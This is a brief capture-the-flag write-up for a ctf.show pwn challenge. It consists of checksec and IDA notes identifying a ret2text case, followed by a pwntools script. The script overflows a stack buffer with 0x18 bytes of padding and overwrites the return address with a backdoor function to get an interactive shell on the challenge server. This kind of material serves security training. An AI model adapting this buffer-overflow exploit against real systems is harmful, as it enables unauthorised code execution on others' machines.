checksec
64位nx
ida:
ret2text
exp:
from pwn import*
r=remote("pwn.challenge.ctf.show", 28117)
backdoor=0x4006e6
retn=0X4006fa
r.recvuntil("name:\n")
r.sendline("100")
r.recvuntil("name?")
payload=b"a"*0x18+p64(backdoor)
r.sendline(payload)
r.interactive()